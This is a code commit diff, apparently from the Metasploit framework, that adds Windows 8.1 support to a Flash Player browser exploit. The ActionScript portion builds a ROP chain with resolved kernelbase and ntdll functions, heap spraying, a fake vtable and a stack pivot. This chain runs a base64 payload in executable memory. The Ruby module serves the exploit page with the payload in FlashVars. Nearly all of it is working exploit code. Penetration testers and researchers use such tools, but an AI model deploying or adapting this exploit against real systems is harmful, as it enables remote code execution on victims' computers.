Land support for Windows 8.1
commit
098f31c1da
Binary file not shown.
|
@ -30,12 +30,14 @@ package
|
||||||
private var b64:Base64Decoder = new Base64Decoder()
|
private var b64:Base64Decoder = new Base64Decoder()
|
||||||
private var payload:ByteArray
|
private var payload:ByteArray
|
||||||
private var platform:String
|
private var platform:String
|
||||||
|
private var os:String
|
||||||
private var original_length:uint = 0
|
private var original_length:uint = 0
|
||||||
|
|
||||||
public function Exploit()
|
public function Exploit()
|
||||||
{
|
{
|
||||||
var i:uint = 0
|
var i:uint = 0
|
||||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||||
|
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||||
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
|
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
|
||||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||||
var pattern:RegExp = / /g;
|
var pattern:RegExp = / /g;
|
||||||
|
@ -118,8 +120,9 @@ package
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
exploiter = new Exploiter(this, platform, payload, uv)
|
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||||
}
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -11,6 +11,7 @@ package
|
||||||
private var eba:ExploitByteArray
|
private var eba:ExploitByteArray
|
||||||
private var payload:ByteArray
|
private var payload:ByteArray
|
||||||
private var platform:String
|
private var platform:String
|
||||||
|
private var op_system:String
|
||||||
private var pos:uint
|
private var pos:uint
|
||||||
private var byte_array_object:uint
|
private var byte_array_object:uint
|
||||||
private var main:uint
|
private var main:uint
|
||||||
|
@ -25,11 +26,12 @@ package
|
||||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||||
private var spray:Vector.<Object> = new Vector.<Object>(89698)
|
private var spray:Vector.<Object> = new Vector.<Object>(89698)
|
||||||
|
|
||||||
public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
|
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
|
||||||
{
|
{
|
||||||
exploit = exp
|
exploit = exp
|
||||||
payload = p
|
payload = p
|
||||||
platform = pl
|
platform = pl
|
||||||
|
op_system = os
|
||||||
|
|
||||||
ev = new ExploitVector(uv)
|
ev = new ExploitVector(uv)
|
||||||
if (!ev.is_ready()) return
|
if (!ev.is_ready()) return
|
||||||
|
@ -133,12 +135,19 @@ package
|
||||||
private function do_rop():void
|
private function do_rop():void
|
||||||
{
|
{
|
||||||
Logger.log("[*] Exploiter - do_rop()")
|
Logger.log("[*] Exploiter - do_rop()")
|
||||||
if (platform == "linux")
|
if (platform == "linux") {
|
||||||
do_rop_linux()
|
do_rop_linux()
|
||||||
else if (platform == "win")
|
} else if (platform == "win") {
|
||||||
do_rop_windows()
|
if (op_system == "Windows 8.1") {
|
||||||
else
|
do_rop_windows8()
|
||||||
|
} else if (op_system == "Windows 7") {
|
||||||
|
do_rop_windows()
|
||||||
|
} else {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
} else {
|
||||||
return
|
return
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
private function do_rop_windows():void
|
private function do_rop_windows():void
|
||||||
|
@ -150,7 +159,6 @@ package
|
||||||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
|
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
|
||||||
var winexec:uint = pe.procedure("WinExec", kernel32)
|
|
||||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
|
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
|
||||||
var createthread:uint = pe.procedure("CreateThread", kernel32)
|
var createthread:uint = pe.procedure("CreateThread", kernel32)
|
||||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||||
|
@ -182,14 +190,14 @@ package
|
||||||
|
|
||||||
// VirtualAlloc
|
// VirtualAlloc
|
||||||
eba.write(0, memcpy)
|
eba.write(0, memcpy)
|
||||||
eba.write(0, 0x70000000)
|
eba.write(0, 0x7f6e0000)
|
||||||
eba.write(0, 0x4000)
|
eba.write(0, 0x4000)
|
||||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||||
|
|
||||||
// memcpy
|
// memcpy
|
||||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||||
eba.write(0, 0x70000000)
|
eba.write(0, 0x7f6e0000)
|
||||||
eba.write(0, payload_address + 8)
|
eba.write(0, payload_address + 8)
|
||||||
eba.write(0, payload.length)
|
eba.write(0, payload.length)
|
||||||
|
|
||||||
|
@ -198,7 +206,74 @@ package
|
||||||
eba.write(0, buffer + 0x10) // return to fix things
|
eba.write(0, buffer + 0x10) // return to fix things
|
||||||
eba.write(0, 0)
|
eba.write(0, 0)
|
||||||
eba.write(0, 0)
|
eba.write(0, 0)
|
||||||
eba.write(0, 0x70000000)
|
eba.write(0, 0x7f6e0000)
|
||||||
|
eba.write(0, 0)
|
||||||
|
eba.write(0, 0)
|
||||||
|
eba.write(0, 0)
|
||||||
|
|
||||||
|
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||||
|
exploit.toString() // call method in the fake vtable
|
||||||
|
}
|
||||||
|
|
||||||
|
private function do_rop_windows8():void
|
||||||
|
{
|
||||||
|
Logger.log("[*] Exploiter - do_rop_windows8()")
|
||||||
|
var pe:PE = new PE(eba)
|
||||||
|
var flash:uint = pe.base(vtable)
|
||||||
|
var winmm:uint = pe.module("winmm.dll", flash)
|
||||||
|
var advapi32:uint = pe.module("advapi32.dll", flash)
|
||||||
|
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
|
||||||
|
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||||
|
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||||
|
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
|
||||||
|
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
|
||||||
|
var createthread:uint = pe.procedure("CreateThread", kernelbase)
|
||||||
|
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||||
|
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
|
||||||
|
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
|
||||||
|
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
|
||||||
|
|
||||||
|
// Continuation of execution
|
||||||
|
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||||
|
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||||
|
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||||
|
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||||
|
|
||||||
|
// Put the payload (command) in memory
|
||||||
|
eba.write(payload_address + 8, payload, true); // payload
|
||||||
|
|
||||||
|
// Put the fake vtabe / stack on memory
|
||||||
|
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||||
|
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||||
|
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||||
|
eba.write(0, virtualprotect)
|
||||||
|
|
||||||
|
// VirtualProtect
|
||||||
|
eba.write(0, virtualalloc)
|
||||||
|
eba.write(0, buffer + 0x10)
|
||||||
|
eba.write(0, 0x1000)
|
||||||
|
eba.write(0, 0x40)
|
||||||
|
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||||
|
|
||||||
|
// VirtualAlloc
|
||||||
|
eba.write(0, memcpy)
|
||||||
|
eba.write(0, 0x7ffd0000)
|
||||||
|
eba.write(0, 0x4000)
|
||||||
|
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||||
|
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||||
|
|
||||||
|
// memcpy
|
||||||
|
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||||
|
eba.write(0, 0x7ffd0000)
|
||||||
|
eba.write(0, payload_address + 8)
|
||||||
|
eba.write(0, payload.length)
|
||||||
|
|
||||||
|
// CreateThread
|
||||||
|
eba.write(0, createthread)
|
||||||
|
eba.write(0, buffer + 0x10) // return to fix things
|
||||||
|
eba.write(0, 0)
|
||||||
|
eba.write(0, 0)
|
||||||
|
eba.write(0, 0x7ffd0000)
|
||||||
eba.write(0, 0)
|
eba.write(0, 0)
|
||||||
eba.write(0, 0)
|
eba.write(0, 0)
|
||||||
eba.write(0, 0)
|
eba.write(0, 0)
|
||||||
|
@ -242,8 +317,6 @@ package
|
||||||
eba.write(0, "\x5e", false) // pop esi
|
eba.write(0, "\x5e", false) // pop esi
|
||||||
eba.write(0, "\xc3", false) // ret
|
eba.write(0, "\xc3", false) // ret
|
||||||
|
|
||||||
// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
|
|
||||||
|
|
||||||
// Put the popen parameters in memory
|
// Put the popen parameters in memory
|
||||||
eba.write(payload_address + 0x8, payload, true) // false
|
eba.write(payload_address + 0x8, payload, true) // false
|
||||||
|
|
||||||
|
|
|
@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:arch => ARCH_X86,
|
:arch => ARCH_X86,
|
||||||
:os_name => lambda do |os|
|
:os_name => lambda do |os|
|
||||||
os =~ OperatingSystems::Match::LINUX ||
|
os =~ OperatingSystems::Match::LINUX ||
|
||||||
os =~ OperatingSystems::Match::WINDOWS_7
|
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||||
|
os =~ OperatingSystems::Match::WINDOWS_81
|
||||||
end,
|
end,
|
||||||
:ua_name => lambda do |ua|
|
:ua_name => lambda do |ua|
|
||||||
case target.name
|
case target.name
|
||||||
|
@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||||
target_payload = get_payload(cli, target_info)
|
target_payload = get_payload(cli, target_info)
|
||||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||||
|
os_name = target_info[:os_name]
|
||||||
|
|
||||||
if target.name =~ /Windows/
|
if target.name =~ /Windows/
|
||||||
platform_id = 'win'
|
platform_id = 'win'
|
||||||
|
@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||||
<param name="movie" value="<%=swf_random%>" />
|
<param name="movie" value="<%=swf_random%>" />
|
||||||
<param name="allowScriptAccess" value="always" />
|
<param name="allowScriptAccess" value="always" />
|
||||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
|
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
|
||||||
<param name="Play" value="true" />
|
<param name="Play" value="true" />
|
||||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
|
||||||
</object>
|
</object>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
Loading…
Reference in New Issue